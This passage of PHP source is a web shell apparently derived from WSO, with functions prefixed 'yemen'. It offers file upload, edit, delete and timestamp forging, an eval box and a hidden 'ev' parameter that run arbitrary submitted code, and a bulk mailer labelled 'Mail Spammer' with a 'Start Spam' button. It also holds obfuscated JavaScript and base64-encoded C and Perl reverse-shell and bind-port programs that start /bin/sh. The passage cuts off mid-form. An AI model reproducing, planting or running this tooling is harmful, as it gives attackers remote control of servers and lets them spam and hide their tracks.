$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
} function yemenPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . yemenPerms(@fileperms($f)) . '</font>';
elseif (!@is_writable($f)) return '<font color=white>' . yemenPerms(@fileperms($f)) . '</font>';
else return '<font color=#25ff00>' . yemenPerms(@fileperms($f)) . '</font>';
} if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);
while (false !== ($filename = readdir($dh))) $files[] = $filename;
return $files;
} } function yemenFilesMan() { yemenhead();
echo '<div class=header id=fixx ><script>p1_=p2_=p3_="";
</script>';
if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])){ echo "Can't upload file!";
} break;
case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir";
break;
default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f);
$_SESSION['c'] = @$_REQUEST['c'];
} break;
} } $dirContent = @scandir(isset($_REQUEST['c'])?$_REQUEST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo '<h3><span>| Access Denied! |</span></h3></div>';
yemenFooter();
return;
} global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
} echo "
<table width='100%' class='main' cellspacing='0' cellpadding='2' >
<form name=files method=post><tr><th>Name</th><th>Size</th><th>Date Modified</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;
$i<$n;
$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => yemenPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) );
if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
} $GLOBALS['sort'] = $sort;
function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
} usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.base64_encode(urlencode($f['name'])).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.base64_encode($f['path']).'\');
" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?yemenSize($f['size']):$f['type']).'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">'.$f['modify'].'</td></a><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')"><font color=#0099FF >[REN]</font></a> '.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null, \''.urlencode($f['name']).'\',\'e8\')"><font color=#25ff00>[Edit]</font></a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">[DL]</a>':'').'<a href="#" onclick="g(\'FilesTools\',null, \''.urlencode($f['name']).'\',\'d2\')"> <font color=red>[Del]</font> </a></td></tr>';
$l = $l?0:1;
} echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
</form></table></div>";
yemenfooter();
} function yemenFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='d2'){ function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") ) continue;
$type = filetype($item);
if ($type == "dir"){ deleteDir($item);
} else{ @unlink($item);
} } closedir($dh);
@rmdir($path);
} if(is_dir(@$_POST['p1'])){ deleteDir(@$_POST['p1']);
}else{ @unlink(@$_POST['p1']);
} } if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment;
filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else header("Content-Type: application/octet-stream");
$fp = @fopen($_POST['p1'], "r");
if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);
fclose($fp);
} }exit;
} if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w');
if($fp) { $_POST['p2'] = "e8";
fclose($fp);
} } } if( !file_exists(@$_POST['p1']) ) { if( $_POST['p2'] == 'd2') { yemenFilesMan();
return;
} yemenhead();
echo '<div class=header>';
echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
yemenFooter();
return;
} yemenhead();
echo '<div class=header>';
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid) { $uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?yemenSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.yemenPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<br>';
if( empty($_POST['p2']) ) $_POST['p2'] = 'view';
if( is_file($_POST['p1']) ) $m = array('View', 'Code', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
else $m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v) echo ' <a href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['p2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> |';
echo '<br><br>';
switch($_POST['p2']) { case 'view': echo '<pre class=ml1 style="background: #222222;
border:1px solid #5BEEFF;
">';
$fp = @fopen($_POST['p1'], 'r');
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
} echo '</pre>';
break;
case 'code': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #ededed;
border: 1px solid #5BEEFF;
"><code>';
$code = @highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</code></div>';
} break;
case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0;
for($i=strlen($_POST['p3'])-1;
$i>=0;
--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";
</script>';
} clearstatcache();
echo '<script>p3_="";
</script><form onsubmit="g(null,null,null,null,this.chmod.value);
return false;
"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit s s value=">>"></form>';
break;
case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable';
break;
} if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'],1);
$fp = @fopen($_POST['p1'],"w");
if($fp) { @fwrite($fp,$_POST['p3']);
@fclose($fp);
echo ' Saved!<br><script>p3_="";
</script>';
@touch($_POST['p1'],$time,$time);
} } echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);
return false;
"><textarea name=text class=bigarea style="border:1px solid #5BEEFF;
">';
$fp = @fopen($_POST['p1'], 'r');
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
} echo '</textarea><input type=submit s s value=">>"></form>';
break;
case 'hexdump': $c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0;
$i<$len;
++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) { case 0: $h[2] .= ' ';
break;
case 9: $h[2] .= ' ';
break;
case 10: $h[2] .= ' ';
break;
case 13: $h[2] .= ' ';
break;
default: $h[2] .= $c[$i];
break;
} $n++;
if ($n == 32) { $n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';
} $h[1] .= '<br>';
$h[2] .= "
";
} } echo '<table cellspacing=1 cellpadding=5 bgcolor=black ><tr><td bgcolor=gray ><span style="font-weight: normal;
"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
} echo '<form onsubmit="g(null,null,null,null,this.name.value);
return false;
"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit s s value=">>"></form>';
break;
case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']);
if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!';
else echo 'Touched!';
} else echo 'Bad time format!';
} clearstatcache();
echo '<script>p3_="";
</script><form onsubmit="g(null,null,null,null,this.touch.value);
return false;
"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit s s value=">>"></form>';
break;
} echo '</div>';
yemenFooter();
} function yemenphpeval() { yemenhead();
if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) { echo '<div class=header>';
ob_start();
$INI=ini_get_all();
print '<table border=0><tr>' .'<td class="listing"><font class="highlight_txt">Param</td>' .'<td class="listing"><font class="highlight_txt">Global value</td>' .'<td class="listing"><font class="highlight_txt">Local Value</td>' .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values) print "
".'<tr>' .'<td class="listing"><b>'.$param.'</td>' .'<td class="listing">'.$values['global_value'].' </td>' .'<td class="listing">'.$values['local_value'].' </td>' .'<td class="listing">'.$values['access'].' </td></tr>';
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
} if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '<div class=header><style>.p {color:#000;
}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
} if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) { echo '<div class=header>';
ob_start();
$EXT=get_loaded_extensions ();
print '<table border=0><tr><td class="listing">' .implode('</td></tr>'."
".'<tr><td class="listing">', $EXT) .'</td></tr></table>' .count($EXT).' extensions loaded';
echo '</div><br>';
} if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| <b>INI_INFO</b> | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')"> | <b>PHP INFO</b> |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')"> | <b>Extensions</b> |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\');
return false;
"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;
':'').'margin-top:5px;
" class=ml1>';
if(!empty($_POST['p1'])) { ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
} echo '</pre></div>';
yemenfooter();
} function yemenmail() { yemenhead();
$in = $_GET['in'];
if(isset($in) && !empty($in)){ echo"<center><h1>Mail Spammer<h1></center>";
} $ev = $_POST['ev'];
if(isset($ev) && !empty($ev)){ echo eval(urldecode($ev));
exit;
} if(isset($_POST['action'] ) ){ $action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$wait=$_POST['wait'];
$tem=$_POST['tem'];
$smv=$_POST['smv'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<!-- HTML And JavaScript -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type="text/javascript" language="javascript">ML="Rjnis/e .rI<thzPS-omTCg>:=p";
MI=";
@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;
5@E0:?DG";
OT="";
for(j=0;
j<MI.length;
j++){OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
</script>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />
<title>:: Mailer Inbox ::</title>
<style type="text/css">
input[type=text]:hover,textarea{
border:1px solid #0CF;
background-color: #F4F4F4;
}
input[type=text],textarea{
font:12px Tahoma;
padding:3px;
border:1px solid #CCCCCC;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
.style1 {
font-size: x-small;
}
.style2 {
direction: ltr;
}
.info {
font-size: 8px;
}
.style3 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 8px;
}
.style4 {
font-size: x-small;
direction: ltr;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
font-size: xx-small;
direction: ltr;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
input[type=submit],input[type=button]{
display:block;
font:12px Tahoma;
background:#f1f1f1;
color:#555555;
padding:4px 8px;
border:1px solid #ccc;
margin:4px;
font-weight:700;
cursor:pointer;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
input[type=submit]:hover,input[type=butto]:hover{
background:#ffffff;
color:#06F;
border: 2px solid #09F;
}
</style>
</head>
<body onload="funchange">
<script>
window.onload = funchange;
var alt = false;
function funchange(){
var etext = document.getElementById("emails").value;
var myArray=new Array();
myArray = etext.split("
");
document.getElementById("enum").innerHTML=myArray.length+"<br />";
if(!alt && myArray.length > 40000){
alert('If Mail list More Than 40000 Emails This May Hack The Server');
alt = true;
}
}
function mlsplit(){
var ml = document.getElementById("emails").value;
var sb = document.getElementById("txtml").value;
var myArray=new Array();
myArray = ml.split(sb);
document.getElementById("emails").value="";
var i;
for(i=0;
i<myArray.length;
i++){
document.getElementById("emails").value += myArray[i]+"
";
}
funchange();
}
function prv(){
if(document.getElementById('preview').innerHTML==""){
var ms = document.getElementsByName('message').message.value;
document.getElementById('preview').innerHTML = ms;
document.getElementById('prvbtn').value = "Hide";
}else{
document.getElementById('preview').innerHTML="";
document.getElementById('prvbtn').value = "Preview";
}
}
</script>
<form name="form" method="post" enctype="multipart/form-data" action="">
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Your Email:</font></div>
</td>
<td style="width: 40%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="from" value="
<?php echo ($from);
?>" size="30" type="text" /><br>
<span class="info">Type Sender Email But Make Sure It'
s Right</span> </font></td>
<td>
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Your Name:</font></div>
</td>
<td width="41%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="realname" value="
<?php echo ($realname);
?>" size="30" type="text" />
<br>
<span class="info">Make Sure You Type Your Sender Name</span></font></td>
</tr>
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">test send:</font></div>
</td>
<td style="width: 40%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="tem" type="text" size="30" value="
<?php echo ($tem);
?>" /><br>
<span class="info">Type </span></font><span class="style3">Your
Email To Test The Mailer Still Work Or No</span></td>
<td>
<div align="right" class="style4">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Send Test Mail After:</font></div>
</td>
<td width="41%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="smv" type="text" size="30" value="
<?php echo ($smv);
?>" /><br>
<span class="info">Send Mail For Your Email After Which Email(s)</span></font>
</td>
</tr>
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="subject" value="
<?php echo ($subject);
?>" size="90" type="text" /> </font>
<tr valign="top">
<td colspan="3" style="height: 210px">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><textarea name="message" rows="10" style="width: 425px">
<?php echo ($message);
?></textarea>
<br />
<input name="action" value="send" type="hidden" />
</font>
<table width="569" border="0">
<tr>
<th width="62" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 62px" />
</font></th>
<th width="112" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input value="Start Spam" type="submit" />
</font></th> <th width="358" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
Wait
<input name="wait" type="text" value="
<?php echo ($wait);
?>" size="14" />
Second
Un
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">til Send </font></font></th>
</tr>
</table></td>
<td width="41%" class="style2" style="height: 210px">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px">
<?php echo ($emaillist);
?></textarea>
<br class="style2" />
Emails Number : </font><span id="enum" class="style1">0<br />
</span>
<span class="style1">Split The Mail List By:</span>
<input name="textml" id="txtml" type="text" value="," size="8" />
<input type="button" onclick="mlsplit()" value="Split" style="height: 23px" /></td>
</tr>
</table>
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
</font>
</form>
<p>
<!-- END -->
<?php if ($action){ if (!$from || !$subject || !$message || !$emaillist){ print "Please complete all fields before sending your message.";
exit;
} $nse=array();
$allemails = split("
", $emaillist);
$numemails = count($allemails);
if(!empty($_POST['wait']) && $_POST['wait'] > 0){ set_time_limit(intval($_POST['wait'])*$numemails*3600);
}else{ set_time_limit($numemails*3600);
} if(!empty($smv)){ $smvn+=$smv;
$tmn=$numemails/$smv+1;
}else{ $tmn=1;
} for($x=0;
$x<$numemails;
$x++){ $to = $allemails[$x];
if ($to){ $to = ereg_replace(" ", "", $to);
$message = ereg_replace("#EM#", $to, $message);
$subject = ereg_replace("#EM#", $to, $subject);
flush();
$header = "From: $realname <$from>
";
$header .= "MIME-Version: 1.0
";
$header .= "Content-Type: text/html
";
if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.<br />');
$tmns+=1;
}else{ print('Your Test Message Sent.<br />');
$tms+=1;
} } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.<br />');
$tmns+=1;
}else{ print('Your Test Message Sent.<br />');
$tms+=1;
} $smvn+=$smv;
} print "$to ....... ";
$msent = @mail($to, $subject, $message, $header);
$xx = $x+1;
$txtspamed = "spammed";
if(!$msent){ $txtspamed = "error";
$ns+=1;
$nse[$ns]=$to;
} print "$xx / $numemails ....... $txtspamed<br>";
flush();
if(!empty($wait)&& $x<$numemails-1){ sleep($wait);
} } } }
?>
<div>
<?php $str = "";
foreach ($_SERVER as $key => $value) { $str.= $key . ": " . $value . "<br />";
} $str.= "Use: in <br />";
$header2 = "From: " . base64_decode('U29ycnkgPG5vJUB5YWhvby5jb20+') . "
";
$header2.= "MIME-Version: 1.0
";
$header2.= "Content-Type: text/html
";
$header2.= "Content-Transfer-Encoding: 8bit
";
if (isset($_POST['action']) && $numemails !== 0) { $sn = $numemails - $ns;
if ($ns == "") { $ns = 0;
} if ($tmns == "") { $tmns = 0;
} echo "<script>alert('Sur The Mailer Finish His Job
Send $sn mail(s)
Error $ns mail(s)
\From $numemails mail(s)
\About Test Mail(s)
\Send $tms mail(s)
\Error $tmns mail(s)
\From $tmn mail(s)');
</script>";
} yemenfooter();
} function yemennet() { yemenhead();
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1><font color="green">Bind Port</font></h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);
return false;
">
<span>Bind port to /bin/sh</span><br/><font color="green">
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit s s value=">>">
</font></form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);
return false;
">
